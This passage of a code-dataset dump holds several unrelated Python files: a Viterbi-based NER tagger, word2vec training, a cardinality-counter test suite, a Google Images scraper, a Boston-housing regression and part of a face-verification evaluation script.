"call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 100, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 118, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 124, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 137, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 155, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 164, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 173, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 184, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 186, "usage_type": "call"}]} +{"seq_id": "177567239", "text": "from collections import Counter\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score\n\n\n# read file and reprocessing data\ndef getDataSet(fileName):\n file = open(fileName, 'r')\n result = []\n wordsSet = []\n tagsSet = []\n word_tags = Counter()\n tag_tags = Counter()\n for line in file:\n context = (line.replace(\"\\n\", \"\")).split(\"\\t\")\n token = context[0].lower().split(\" \")\n tags = context[1].split(\" \")\n wordsSet.extend(token)\n tagsSet.extend(tags)\n for i in range(len(token)):\n word_tags[token[i] + \"_\" + tags[i]] += 1\n if i > 0:\n tag_tags[tags[i - 1] + \"_\" + tags[i]] += 1\n else:\n tag_tags[str(None) + \"_\" + tags[i]] += 1\n result.append(list(zip(token, tags)))\n return result, list(set(wordsSet)), list(set(tagsSet)), dict(word_tags), dict(tag_tags)\n\n\ndef 
initW(wordsSet, tagsSet):\n W = {}\n for word in wordsSet:\n for tag in tagsSet:\n W[word + \"_\" + tag] = 0\n for tag1 in tagsSet:\n W[str(None) + \"_\" + tag1] = 0\n for tag2 in tagsSet:\n W[tag1 + \"_\" + tag2] = 0\n return W\n\n\ndef viterbi(dataTokens, tagsSet, tag_tags, word_tags, W):\n \"\"\"\n :param dataTokens: observation sequence\n :param tagsSet: hidden states\n :param tag_tags: transition probabilities (between hidden states)\n :param word_tags: emission probabilities (probability of a hidden state emitting the observed word)\n :return:\n \"\"\"\n # path probability table: V[time][hidden state] = probability\n V = [{}]\n # an intermediate variable recording which hidden state the current state is\n path = {}\n\n # initialize the initial state (t == 0)\n for y in tagsSet:\n V[0][y] = W.get(str(None) + \"_\" + y, 0) * \\\n tag_tags.get(str(None) + \"_\" + y, 0) * \\\n word_tags.get(dataTokens[0] + \"_\" + y, 0)\n path[y] = [y]\n\n # run the Viterbi algorithm for t > 0\n for t in range(1, len(dataTokens)):\n V.append({})\n newpath = {}\n\n for y in tagsSet:\n # prob of hidden state y = W * prob(previous state is y0) * prob(y0 -> y transition) * prob(y emits the current observation)\n\n (prob, state) = max([(V[t - 1][y0] *\n W.get(y0 + \"_\" + y, 0) *\n tag_tags.get(y0 + \"_\" + y, 0) *\n word_tags.get(dataTokens[t] + \"_\" + y, 0), y0) for y0 in tagsSet])\n # record the maximum probability\n V[t][y] = prob\n # record the path\n newpath[y] = path[state] + [y]\n\n # no need to keep the old paths\n path = newpath\n\n (prob, state) = max([(V[len(dataTokens) - 1][y], y) for y in tagsSet])\n return (prob, path[state])\n\n\ndef training(dataSet, wordsSet, tagsSet, word_tags, tag_tags):\n W = initW(wordsSet, tagsSet)\n random.seed(2)\n R = random.random()\n for loop in range(10):\n random.shuffle(dataSet, lambda: R)\n # random.shuffle(dataSet)\n cw = 0\n for data in dataSet:\n dataTokens, dataTags = zip(*data) # separate the data pairs\n predictTag = viterbi(dataTokens, tagsSet, tag_tags, word_tags, W)\n if (not checkList(predictTag[1], dataTags)):\n # print(\"pre:{} # dataT:{}\".format(predictTag[1], dataTags))\n cw += 1\n W = updateW(W, dataTokens, dataTags, predictTag[1], word_tags, tag_tags)\n return W\n\n\ndef updateW(W, dataTokens, dataTags, predictTags, word_tags, tag_tags):\n for i in range(len(dataTags)):\n wordTag_Right = dataTokens[i] + \"_\" + dataTags[i]\n wordTag_Predict = dataTokens[i] + \"_\" + predictTags[i]\n if i > 0:\n tagTag_Right = dataTags[i - 1] + \"_\" + dataTags[i]\n tagTag_Predict = predictTags[i - 1] + \"_\" + predictTags[i]\n else:\n tagTag_Right = str(None) + \"_\" + dataTags[i]\n tagTag_Predict = str(None) + \"_\" + predictTags[i]\n W[wordTag_Right] += word_tags[wordTag_Right] / len(word_tags)\n W[tagTag_Right] += tag_tags[tagTag_Right] / len(tag_tags)\n W[wordTag_Predict] -= word_tags.get(wordTag_Predict, 0) / len(word_tags)\n W[tagTag_Predict] -= tag_tags.get(tagTag_Predict, 0) / len(tag_tags)\n # temp = \"W[{}]:{}, W[{}]:{}, W[{}]:{}, W[{}]:{}\".format(\n # wordTag_Right, W[wordTag_Right],\n # tagTag_Right, W[tagTag_Right],\n # wordTag_Predict, W[wordTag_Predict],\n # tagTag_Predict, W[tagTag_Predict]\n # )\n # print(temp)\n return W\n\n\ndef testing(dataSet_test, tagsSet, W):\n index = 0\n predictLable = []\n correctLable = []\n for data in dataSet_test:\n dataToken_test, dataTag_test = zip(*data)\n predict_test = viterbi(dataToken_test, tagsSet, tag_tags, word_tags, W)\n correctLable.extend(list(dataTag_test))\n predictLable.extend(predict_test[1])\n if (checkList(predict_test[1], dataTag_test)):\n index += 1\n # print(index, \" @@ \", predict_test[1], \" ## \", dataTag_test)\n print(correctLable)\n print(predictLable)\n print(\"index:{},length:{},rate:{}\".format(index, len(dataSet_test), index / len(dataSet_test)))\n f1_micro = f1_score(correctLable, predictLable, average='micro', labels=['ORG', 'MISC', 'PER', 'LOC'])\n 
print(\"f1_micro: \", f1_micro)\n\n\ndef checkList(list1, list2):\n if (len(list1) != len(list2)):\n return False\n for i in range(len(list1)):\n if (list1[i] != list2[i]):\n return False\n return True\n\n\nstartTime = time.time() # start time\ndataSet, wordsSet, tagsSet, word_tags, tag_tags = getDataSet(\"train.txt\")\ndataSet_test, wordsSet_test, tagsSet_test, word_tags_test, tag_tags_test = getDataSet(\"test.txt\")\n\n# print(dataSet)\n# print(wordsSet)\n# print(tagsSet)\n# print(word_tags)\n# print(tag_tags)\n\nW = training(dataSet, wordsSet, tagsSet, word_tags, tag_tags)\n# print(len(wordsSet), len(tagsSet))\n# print(len(W))\n# for k, v in W.items():\n# if (v != 0):\n# print(k, v)\ntesting(dataSet_test, tagsSet, W)\n\nendTime = time.time() # end time\nprint(endTime - startTime, \"s\") # show the time cost\n", "sub_path": "lab_7/lab7_v1.py", "file_name": "lab7_v1.py", "file_ext": "py", "file_size_in_byte": 6046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 15, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 90, "usage_type": "call"}, {"api_name": "random.random", "line_number": 91, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "609148467", "text": "import gensim, logging, os,pickle\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nclass MySentences(object):\n def __init__(self, filename):\n self.datapkl = pickle.load(open(filename,'rb'))\n \n def __iter__(self):\n \tfor line in self.datapkl:\n \t\tyield line[0]\n\nif __name__ == \"__main__\":\n\t\n\t\n\t#sentences = MySentences(filename) # a memory-friendly iterator\n\tfilename = '../dataset/pickles/train_lines.pkl' #train word2vec\n\tsentences = list()\n\tdatapkl = pickle.load(open(filename,'rb'))\n\tfor i in datapkl:\n\t\tsentences.append(i[0].split())\n\t\t#sentences.append([i[0].strip()])\n\t\t#sentences.append(i[0].decode('utf-8'))\n\n\tfilename = '../dataset/pickles/test_lines.pkl' #train word2vec\n\tdatapkl = pickle.load(open(filename,'rb'))\n\tfor i in datapkl:\n\t\tsentences.append(i[0].split())\n\t\t#sentences.append([i[0].strip()])\n\t\n\t#train word2vec on test sentences also - check performance.\n\t#print sentences\n\tmodel = gensim.models.Word2Vec(sentences,min_count=1,size=50)\n\n\tmodel.save('w2vmodel')\n", "sub_path": "final/word2vec/word2vec_train.py", "file_name": "word2vec_train.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 2, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 2, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 25, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "437730059", "text": 
"import torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\nclass RMSELoss(nn.Module):\n def __init__(self, eps=1e-6):\n super().__init__()\n self.mse = nn.MSELoss()\n self.eps = eps\n \n def forward(self, yhat, y):\n loss = torch.sqrt(self.mse(yhat,y) + self.eps)\n return loss\n\n\n#help(nn.MSELoss())\ndef plot(train_loss, test_loss):\n x = [*range(1, len(train_loss))]\n plt.plot(x, train_loss[1:], label = 'train_loss')\n plt.plot(x, test_loss[1:], label = 'test_loss')\n plt.legend()\n plt.grid()\n plt.savefig('train_test_loss.png')\n plt.clf()", "sub_path": "Matrix Factorization/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "254754358", "text": "import pytest\n\nfrom pdsa.cardinality.probabilistic_counter import ProbabilisticCounter\n\n\nLOREM_TEXT = {\n \"text\": (\n \"Lorem ipsum dolor sit amet consectetur adipiscing elit Donec quis \"\n \"felis at velit pharetra dictum Sed vehicula est at mi lobortis \"\n \"vitae suscipit mi aliquet Sed ut pharetra nisl Donec maximus enim \"\n \"sit amet erat ullamcorper ut mattis mauris gravida Nulla sagittis \"\n \"quam a arcu pretium iaculis Donec vestibulum tellus nec ligula \"\n \"mattis vitae aliquam augue dapibus Curabitur pulvinar elit nec \"\n \"blandit pharetra ipsum elit ultrices sem et bibendum lorem arcu \"\n \"sit amet arcu Nam pulvinar porta molestie Integer posuere ipsum \"\n \"venenatis velit euismod accumsan sed quis nibh Suspendisse libero \"\n \"odio tempor ultricies lectus non volutpat rutrum diam Nullam et \"\n \"sem eu quam sodales vulputate Nulla condimentum blandit mi ac \"\n \"varius quam vehicula id Quisque sit amet molestie lacus ac \"\n \"efficitur ante Proin orci lacus fringilla nec eleifend non \"\n \"maximus vel ipsum Sed luctus enim tortor cursus semper mauris \"\n \"ultrices vel Vivamus eros purus sodales sed lectus at accumsan \"\n \"dictum massa Integer pulvinar tortor sagittis tincidunt risus \"\n \"non ultricies augue Aenean efficitur justo orci at semper ipsum \"\n \"efficitur ut Phasellus tincidunt nibh ut eros bibendum eleifend \"\n \"Donec porta risus nec placerat 
viverra leo justo sollicitudin \"\n \"metus a lacinia mi justo ut augue Duis dolor lacus sodales ut \"\n \"tortor eu rutrum\"\n ),\n \"num_of_words\": 200,\n \"num_of_unique_words\": 111,\n \"num_of_unique_words_icase\": 109\n}\n\n\ndef test_init():\n pc = ProbabilisticCounter(10)\n assert pc.sizeof() == 40, \"Unexpected size in bytes\"\n\n with pytest.raises(ValueError) as excinfo:\n pc = ProbabilisticCounter(0)\n assert str(excinfo.value) == 'At least one simple counter is required'\n\n\ndef test_repr():\n pc = ProbabilisticCounter(10)\n\n assert repr(pc) == (\n \"\")\n\n\ndef test_add():\n pc = ProbabilisticCounter(10)\n\n for word in [\"test\", 1, {\"hello\": \"world\"}]:\n pc.add(word)\n\n\ndef test_count_big():\n pc = ProbabilisticCounter(256)\n\n # NOTE: make n/m > 50 to avoid correction for small cardinalities usage\n boost = 50 * LOREM_TEXT[\"num_of_unique_words\"] // 64 + 1\n num_of_unique_words = boost * LOREM_TEXT[\"num_of_unique_words\"]\n\n for i in range(boost):\n for word in LOREM_TEXT[\"text\"].split():\n pc.add(\"{}_{}\".format(word, i))\n\n cardinality = pc.count()\n assert cardinality >= 0.8 * num_of_unique_words\n assert cardinality <= 1.2 * num_of_unique_words\n\n\ndef test_count_small():\n pc = ProbabilisticCounter(64, True)\n assert pc.count() == 0\n\n for word in LOREM_TEXT[\"text\"].split():\n pc.add(word)\n\n num_of_unique_words = LOREM_TEXT[\"num_of_unique_words\"]\n\n cardinality = pc.count()\n assert cardinality >= 0.5 * num_of_unique_words\n assert cardinality <= 1.5 * num_of_unique_words\n\n\ndef test_len():\n pc = ProbabilisticCounter(10)\n assert len(pc) == 320\n", "sub_path": "tests/cardinality/test_probabilistic_counter.py", "file_name": "test_probabilistic_counter.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 40, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 41, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 46, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 53, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 60, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 76, "usage_type": "call"}, {"api_name": "pdsa.cardinality.probabilistic_counter.ProbabilisticCounter", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "618333091", "text": "# initial variable setup\nimport sys, os, errno\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib, urllib.request\nimport requests\nimport random\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n###initial set\n\nfolder = \"./image/\"\nwebDriver = \"./chromedriver.exe\"\nsearchItems = [\"아이디어 유모차\",\"자전거 유모차\",\"페도라 유모차\",\"컨셉 유모차\",\"클래식 유모차\",\"전동 유모차\"]\nsize = 300\n\nfor item in searchItems:\n params ={\n \"q\":item\n ,\"tbm\":\"isch\"\n ,\"sa\":\"1\"\n ,\"source\":\"lnms&tbm=isch\"\n }\n\n print(params)\n\n url = \"https://www.google.com/search\"\n # launch the browser\n url = url+\"?\"+urllib.parse.urlencode(params)\n\n print(url)\n\n 
browser = webdriver.Chrome(webDriver)\n time.sleep(0.5)\n browser.get(url)\n html = browser.page_source\n time.sleep(0.5)\n\n\n #Page Down\n ### get number of image for a page\n soup_temp = BeautifulSoup(html,'html.parser')\n img4page = len(soup_temp.findAll(\"img\"))\n\n ### page down \n elem = browser.find_element_by_tag_name(\"body\")\n imgCnt =0\n\n\n while imgCnt < size*10:\n # elem.send_keys(Keys.PAGE_DOWN)\n\n More_Results = browser.find_element_by_xpath('//*[@id=\"islmp\"]/div/div/div/div/div[5]/input')\n try:\n elem.send_keys(Keys.PAGE_DOWN)\n More_Results.click()\n except :\n elem.send_keys(Keys.PAGE_DOWN)\n\n rnd = random.random()\n # print(imgCnt)\n time.sleep(rnd)\n imgCnt+=img4page\n\n\n\n # parse the html and extract the src attributes\n html = browser.page_source\n soup = BeautifulSoup(html,'html.parser')\n img = soup.findAll(\"img\")\n\n browser.find_elements_by_tag_name('img')\n\n fileNum=0\n srcURL=[]\n\n for line in img:\n if str(line).find('data-src') != -1 and str(line).find('http')<100: \n # print(fileNum, \" : \", line['data-src']) \n srcURL.append(line['data-src'])\n fileNum+=1\n\n\n\n # create the folder and save the files\n ### make folder and save picture in that directory\n saveDir = folder+item\n\n try:\n if not(os.path.isdir(saveDir)):\n os.makedirs(os.path.join(saveDir))\n except OSError as e:\n if e.errno != errno.EEXIST:\n print(\"Failed to create directory!!!!!\")\n raise\n\n for i,src in zip(range(fileNum),srcURL):\n try:\n urllib.request.urlretrieve(src, saveDir+\"/\"+str(i)+\".png\")\n # print(i,\"saved\")\n except :\n print(\"Image could not be found.\")\n \n browser.quit()\n", "sub_path": "원본.py", "file_name": "원본.py", "file_ext": "py", "file_size_in_byte": 2626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib.parse.urlencode", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.PAGE_DOWN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.PAGE_DOWN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 60, "usage_type": "name"}, {"api_name": "random.random", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 101, "usage_type": "attribute"}]} +{"seq_id": "184406995", "text": "from sklearn.datasets import load_boston\r\nimport pandas as 
pd\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nboston_data = load_boston()\r\n\r\nboston = pd.DataFrame(data=boston_data.data, columns=boston_data.feature_names)\r\nboston['target'] = boston_data.target\r\n\r\ntrain = boston.sample(frac=0.8, random_state=200)\r\ntest = boston.drop(train.index)\r\n\r\nmlr = LinearRegression()\r\nmlr.fit(train[['PTRATIO', 'INDUS', 'NOX', 'B', 'CHAS', 'RAD', 'TAX', 'ZN', 'DIS', 'CRIM', 'RM', 'LSTAT', 'AGE']], train['target'])\r\nprint(mlr.intercept_)\r\nprint(mlr.coef_)\r\n\r\nsum_difference = 0\r\nfor i, row in test.iterrows():\r\n estimate = row['PTRATIO'] * mlr.coef_[0] + row['INDUS'] * mlr.coef_[1] + row['NOX'] * mlr.coef_[2] + \\\r\n row['B'] * mlr.coef_[3] + row['CHAS'] * mlr.coef_[4] + row['RAD'] * mlr.coef_[5] + \\\r\n row['TAX'] * mlr.coef_[6] + row['ZN'] * mlr.coef_[7] + row['DIS'] * mlr.coef_[8] + \\\r\n row['CRIM'] * mlr.coef_[9] + row['RM'] * mlr.coef_[10] + row['LSTAT'] * mlr.coef_[11] + \\\r\n row['AGE'] * mlr.coef_[12] + mlr.intercept_\r\n sum_difference += abs(estimate - row['target'])\r\nprint(sum_difference)", "sub_path": "test6.py", "file_name": "test6.py", "file_ext": "py", "file_size_in_byte": 1130, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.datasets.load_boston", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "501768315", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 09:57:19 2019\n\n@author: taozhu\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport math\nfrom scipy import interpolate\nfrom sklearn import metrics\nimport torch\nimport cfg\nimport cv2\nimport pandas as pd\nimport argparse\nfrom scipy.optimize import brentq\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom model import LightCNN_29Layers_v3\nfrom model import l2_norm\n\n\ndef p_args():\n parser = argparse.ArgumentParser(description='lightcnn_train_gt',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--session_name', default='light_no_arc')\n parser.add_argument(\n '--csv_path', default='./save/csv2/valid_data_done.csv')\n parser.add_argument('--pretrained_weights_path', default='./save/weights')\n\n # train\n parser.add_argument('--pretrained', default=True, type=bool)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--cuda', default=False, type=bool)\n parser.add_argument('--num_workers', default=8, type=int)\n parser.add_argument('--pin_memory', default=True, type=bool)\n parser.add_argument('--epoch', default=1000, type=int)\n parser.add_argument('--trainval_split', default=0.1, type=int)\n\n # adjust\n parser.add_argument('--lr', default=1e-6, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight_decay', default=1e-4, type=float)\n\n args = parser.parse_args()\n return args\n\n\ndef read_pairs(pairs_filename):\n pairs = []\n with open(pairs_filename, 'r') as f:\n for line in f.readlines()[1:]:\n pair = line.strip().split()\n pairs.append(pair)\n return np.array(pairs)\n\n\ndef add_extension(path):\n if os.path.exists(path+'.jpg'):\n return path+'.jpg'\n elif os.path.exists(path+'.png'):\n return path+'.png'\n else:\n raise RuntimeError('No file \"%s\" with extension png or 
jpg.' % path)\n\n\ndef get_paths(csv):\n data = pd.read_csv(csv)\n nrof_skipped_pairs = 0\n path_list = []\n issame_list = []\n for index in data.index:\n if int(data.loc[index]['label']) == 1:\n path0 = data.loc[index]['s1']\n path1 = data.loc[index]['s2']\n issame = True\n else:\n path0 = data.loc[index]['s1']\n path1 = data.loc[index]['s2']\n issame = False\n # Only add the pair if both paths exist\n if os.path.exists(path0) and os.path.exists(path1):\n path_list += (path0, path1)\n issame_list.append(issame)\n else:\n nrof_skipped_pairs += 1\n if nrof_skipped_pairs > 0:\n print('Skipped %d image pairs' % nrof_skipped_pairs, flush=True)\n\n return path_list, issame_list\n\n\ndef distance(embeddings1, embeddings2, distance_metric=0):\n if distance_metric == 0:\n # Euclidean distance\n diff = np.subtract(embeddings1, embeddings2)\n dist = np.sum(np.square(diff), 1)\n elif distance_metric == 1:\n # Distance based on cosine similarity\n dot = np.sum(np.multiply(embeddings1, embeddings2), axis=1)\n norm = np.linalg.norm(embeddings1, axis=1) * \\\n np.linalg.norm(embeddings2, axis=1)\n similarity = dot / norm\n dist = np.arccos(similarity) / math.pi\n else:\n raise ValueError('Undefined distance metric %d' % distance_metric)\n\n return dist\n\n\ndef calculate_accuracy(threshold, dist, actual_issame):\n predict_issame = np.less(dist, threshold)\n tp = np.sum(np.logical_and(predict_issame, actual_issame))\n fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n tn = np.sum(np.logical_and(np.logical_not(\n predict_issame), np.logical_not(actual_issame)))\n fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))\n\n tpr = 0 if (tp+fn == 0) else float(tp) / float(tp+fn)\n fpr = 0 if (fp+tn == 0) else float(fp) / float(fp+tn)\n acc = float(tp+tn)/dist.size\n return tpr, fpr, acc\n\n\ndef calculate_val_far(threshold, dist, actual_issame):\n predict_issame = np.less(dist, threshold)\n true_accept = np.sum(np.logical_and(predict_issame, actual_issame))\n false_accept = np.sum(np.logical_and(\n predict_issame, np.logical_not(actual_issame)))\n n_same = np.sum(actual_issame)\n n_diff = np.sum(np.logical_not(actual_issame))\n val = float(true_accept) / float(n_same)\n far = float(false_accept) / float(n_diff)\n return val, far\n\n\ndef calculate_val(thresholds, embeddings1, embeddings2, actual_issame, far_target, nrof_folds=10, distance_metric=0, subtract_mean=False):\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n val = np.zeros(nrof_folds)\n far = 